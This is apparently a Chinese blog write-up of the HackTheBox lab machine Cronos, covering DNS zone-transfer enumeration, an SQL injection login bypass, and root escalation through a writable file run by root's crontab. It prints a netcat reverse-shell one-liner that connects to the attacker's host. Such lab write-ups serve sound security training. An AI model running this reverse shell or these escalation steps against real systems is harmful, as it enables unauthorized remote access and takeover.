HackTheBox-Linux-Cronos

  • A+
所属分类:安全工具

一个每日分享渗透小技巧的公众号HackTheBox-Linux-Cronos



大家好,这里是 大余安全 的第 98 篇文章,本公众号会每日分享攻防渗透技术给大家。



靶机地址:https://www.hackthebox.eu/home/machines/profile/11

靶机难度:初级(4.5/10)

靶机发布日期:2017年10月13日

靶机描述:

CronOS focuses mainly on different vectors for enumeration and also emphasises the risks associated with adding world-writable files to the root crontab. This machine also includes an introductory-level SQL injection vulnerability.


请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。



HackTheBox-Linux-Cronos

一、信息收集

HackTheBox-Linux-Cronos


HackTheBox-Linux-Cronos

可以看到靶机的IP是10.10.10.13....

HackTheBox-Linux-Cronos

Nmap发现了一个OpenSSH服务器,一个DNS服务器和一个Apache服务器...

HackTheBox-Linux-Cronos

这里应该是存在子域名信息...

HackTheBox-Linux-Cronos

尽管必须猜测初始域名cronos.htb,可以通过进行区域传输来枚举其余的子域,将cronos.htb添加到/etc/hosts文件后,使用dig发现了admin....域名...继续添加即可...

HackTheBox-Linux-Cronos

通过获得的子域名,添加到hosts后,访问是登陆页面...

HackTheBox-Linux-Cronos

HackTheBox-Linux-Cronos

通过测试...存在sql注入...简单的注入登陆进来了...是一个cmd类似的命令框架...这就直接提权即可...

HackTheBox-Linux-Cronos

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.51 4444 >/tmp/f

直接一句话提权输入...获得了低权shell,成功获得user信息...

HackTheBox-Linux-Cronos

利用https://github.com/rebootuser/LinEnum工具上传枚举linux服务器所有信息...

HackTheBox-Linux-Cronos

通过集体枚举,查看到crontab每分钟以root身份执行/var/www/laravel/artisan...并且进入查看后具有写入等功能...

HackTheBox-Linux-Cronos

这里我直接利用kali自导的shell覆盖提权..成功获得了root信息...(常规操作)

或者还可以echo写入shell命令,等等方式提权,随便怎么弄...



当然还可以在/var/www/admin/config里头查看到mysql账号密码...通过访问数据库获得admin的哈希密码...爆破即可...需要时间....


由于我们已经成功得到root权限查看user和root.txt,因此完成这台简单的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。


如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。



如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~

HackTheBox-Linux-Cronos
HackTheBox-Linux-Cronos


HackTheBox-Linux-Cronos


随缘收徒中~~随缘收徒中~~随缘收徒中~~


欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!

HackTheBox-Linux-Cronos

大余安全

一个全栈渗透小技巧的公众号

HackTheBox-Linux-Cronos

本文始发于微信公众号(大余安全):HackTheBox-Linux-Cronos

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: